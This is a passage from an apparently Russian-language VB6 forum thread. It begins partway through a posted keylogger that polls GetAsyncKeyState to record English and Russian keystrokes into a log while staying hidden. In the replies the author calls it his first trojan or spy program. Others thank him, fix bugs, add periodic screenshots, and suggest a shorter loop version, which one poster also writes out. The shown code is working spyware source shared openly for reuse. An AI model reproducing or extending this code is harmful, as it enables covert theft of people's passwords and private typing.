If Shift = 0 And (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "-"
     End If
If Shift <> 0 And (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "_"
     End If
keystate = Getasynckeystate(&HBE)
If Shift = 0 And (keystate And &H1) = &H1 Then
        If l$ = "English" Then
        AllKeyLog = AllKeyLog + "."
        ElseIf l$ = "Russian" Then
        AllKeyLog = AllKeyLog + "ю"
        End If
    End If
If Shift <> 0 And (keystate And &H1) = &H1 Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + ">"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "Ю"
    End If
    End If
keystate = Getasynckeystate(&HBF)
If Shift = 0 And (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "/"
     End If
     If Shift <> 0 And (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "?"
     End If
keystate = Getasynckeystate(&HC0)
If Shift = 0 And (keystate And &H1) = &H1 Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "`"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "ё"
    End If

     End If
     If Shift <> 0 And (keystate And &H1) = &H1 Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "~"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "Ё"
    End If

     End If
keystate = Getasynckeystate(&HDB)
If Shift = 0 And (keystate And &H1) = &H1 Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "["
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "х"
    End If
     End If
     If Shift <> 0 And (keystate And &H1) = &H1 Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "{"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "Х"
    End If
     End If
keystate = Getasynckeystate(&HDC)
If Shift = 0 And (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "\"
     End If
     If Shift <> 0 And (keystate And &H1) = &H1 Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "|"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "/"
    End If
     End If
keystate = Getasynckeystate(&HDD)
If Shift = 0 And (keystate And &H1) = &H1 Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "]"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "ъ"
    End If
     End If
     If Shift <> 0 And (keystate And &H1) = &H1 Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "}"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "Ъ"
    End If
     End If
keystate = Getasynckeystate(&HDE)
If Shift = 0 And (keystate And &H1) = &H1 Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "'"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "э"
    End If
     End If
     If Shift <> 0 And (keystate And &H1) = &H1 Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + Chr$(34)
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "Э"
    End If
    End If
keystate = Getasynckeystate(vbKeyMultiply)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "*"
     End If
keystate = Getasynckeystate(vbKeyDivide)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "/"
     End If
keystate = Getasynckeystate(vbKeyAdd)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "+"
     End If
keystate = Getasynckeystate(vbKeySubtract)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "-"
     End If
keystate = Getasynckeystate(vbKeyDecimal)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{Del or ,}"
     End If
   keystate = Getasynckeystate(vbKeyF1)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{F1}"
     End If
   keystate = Getasynckeystate(vbKeyF2)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{F2}"
     End If
   keystate = Getasynckeystate(vbKeyF3)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{F3}"
     End If
   keystate = Getasynckeystate(vbKeyF4)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{F4}"
     End If
   keystate = Getasynckeystate(vbKeyF5)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{F5}"
     End If
   keystate = Getasynckeystate(vbKeyF6)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{F6}"
     End If
   keystate = Getasynckeystate(vbKeyF7)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{F7}"
     End If
   keystate = Getasynckeystate(vbKeyF8)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{F8}"
     End If
   keystate = Getasynckeystate(vbKeyF9)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{F9}"
     End If
   keystate = Getasynckeystate(vbKeyF10)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{F10}"
     End If
   keystate = Getasynckeystate(vbKeyF11)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{F11}"
     End If
   keystate = Getasynckeystate(vbKeyF12)
If Shift = 0 And (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{F12}"
     End If
'When the user hits F12, the program becomes visible.
'If Shift <> 0 And (keystate And &H1) = &H1 Then
'   Form1.Visible = True
'     End If
    keystate = Getasynckeystate(vbKeyNumlock)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{NumLock}"
     End If
     keystate = Getasynckeystate(vbKeyScrollLock)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{ScrollLock}"
         End If
    keystate = Getasynckeystate(vbKeyPrint)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{PrintScreen}"
         End If
       keystate = Getasynckeystate(vbKeyPageUp)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{PageUp}"
         End If
       keystate = Getasynckeystate(vbKeyPageDown)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{Pagedown}"
         End If
         keystate = Getasynckeystate(vbKeyNumpad1)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "1"
         End If
         keystate = Getasynckeystate(vbKeyNumpad2)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "2"
         End If
         keystate = Getasynckeystate(vbKeyNumpad3)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "3"
         End If
         keystate = Getasynckeystate(vbKeyNumpad4)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "4"
         End If
         keystate = Getasynckeystate(vbKeyNumpad5)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "5"
         End If
         keystate = Getasynckeystate(vbKeyNumpad6)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "6"
         End If
         keystate = Getasynckeystate(vbKeyNumpad7)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "7"
         End If
         keystate = Getasynckeystate(vbKeyNumpad8)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "8"
         End If
         keystate = Getasynckeystate(vbKeyNumpad9)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "9"
         End If
         keystate = Getasynckeystate(vbKeyNumpad0)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "0"
         End If

End Sub

За код не пинайте, дело было года 3-4 назад...


Номер ответа: 2
Автор ответа:
 D o c a l

ICQ: 408802757 

Вопросов: 76
Ответов: 985
 Профиль | | #2
Добавлено: 14.03.07 21:04
Ну ти зверь Hacker, однако


Номер ответа: 3
Автор ответа:


Разработчик Offline Client

Вопросов: 236
Ответов: 8362
 Профиль | | #3 Добавлено: 14.03.07 21:10


Номер ответа: 4
Автор ответа:

Лидер форума

ICQ: 216865379 

Вопросов: 106
Ответов: 9979
 Профиль | | #4
Добавлено: 15.03.07 17:15
Если бы кто-то у меня увидел такой код, я бы, наверно, повесился от позора. Мой регсетап, написанный в 10-м классе на скорую руку тоже, конечно, не блещет, но такоооооееее....


Номер ответа: 5
Автор ответа:

Вопросов: 71
Ответов: 246
 Профиль | | #5 Добавлено: 15.03.07 19:36
Большое спасибо, ХАКЕР, код работает!


Номер ответа: 6
Автор ответа:


Разработчик Offline Client

Вопросов: 236
Ответов: 8362
 Профиль | | #6 Добавлено: 15.03.07 21:10
2 Sharp
Большое спасибо, ХАКЕР, код работает!

от нах критика? :) К тому же на сколько я помню, идея не моя, там в примере вроде было просто для англ букв... фишка заключалась в том что код действительно работал не пропуская буквы при удержании клавищи... видать все эти проверки достаточно быстро выполняются в таймере... это и отличало данную идею от всех остальных примеров... Ну а далее уже я химичил, с определением окна, поддержкой русской расскладке, заглавные/строчные буквы итп итд :) Я тогда кажись первый троян писал )) ну или шпион, до трояна так и не дотянул:)


Номер ответа: 7
Автор ответа:

Вопросов: 71
Ответов: 246
 Профиль | | #7 Добавлено: 15.03.07 23:12
Я немного подправил код, там не распознавалась точка и буква "ж", ну и еще несколько гюков, короче, кому надо - качайте:


Номер ответа: 8
Автор ответа:

Лидер форума

ICQ: 216865379 

Вопросов: 106
Ответов: 9979
 Профиль | | #8
Добавлено: 16.03.07 18:25
Да я не про то, что этот код делает, а про то, как он написан. Написан он методом тупейшего копипаста, какой только возможен.


Номер ответа: 9
Автор ответа:


Разработчик Offline Client

Вопросов: 236
Ответов: 8362
 Профиль | | #9 Добавлено: 16.03.07 18:39
Предложиш, без хука, так же работающий код как этот, но лучше ?


Номер ответа: 10
Автор ответа:

Лидер форума

ICQ: 216865379 

Вопросов: 106
Ответов: 9979
 Профиль | | #10
Добавлено: 17.03.07 02:35
Ты опять не понял. Я про бесконечное повторение одного и того же фрагмента вида

keystate = Getasynckeystate(vbKeyPageUp)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{PageUp}"
End If

Это офигительное уродство просто.


Номер ответа: 11
Автор ответа:

Вопросов: 71
Ответов: 246
 Профиль | | #11 Добавлено: 17.03.07 11:03
Я добваил возможность авто-скришота каждые полчаса, опять же

Это офигительное уродство просто

Вродде это можно сделать через For...Next, типа
For i = 1 to 255
keystate = Getasynckeystate(i)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + chr(i)
End If


Номер ответа: 12
Автор ответа:

Лидер форума

ICQ: 216865379 

Вопросов: 106
Ответов: 9979
 Профиль | | #12
Добавлено: 17.03.07 14:39
Это не можно делать через цикл, это нужно делать через цикл :)


Номер ответа: 13
Автор ответа:


Разработчик Offline Client

Вопросов: 236
Ответов: 8362
 Профиль | | #13 Добавлено: 17.03.07 17:11
Непомню, но помойму циклом глотало некоторые буквы при удержании её


Номер ответа: 14
Автор ответа:


Разработчик Offline Client

Вопросов: 236
Ответов: 8362
 Профиль | | #14 Добавлено: 17.03.07 17:45
проверил, щас и циклом работает :) Я когда это писал у меня ещё вин98 стояла, наверное там дела подругому обстоят. А может и я прогнал :) Кстати, снифер это немного не то, если про клаву обычно кейлогером называют :)


Номер ответа: 15
Автор ответа:
 D o c a l

ICQ: 408802757 

Вопросов: 76
Ответов: 985
 Профиль | | #15
Добавлено: 17.03.07 19:59
Бля вирусописатели Повню когда я написал что кто умеет заражать файли меня обозвали і удалили нахре..


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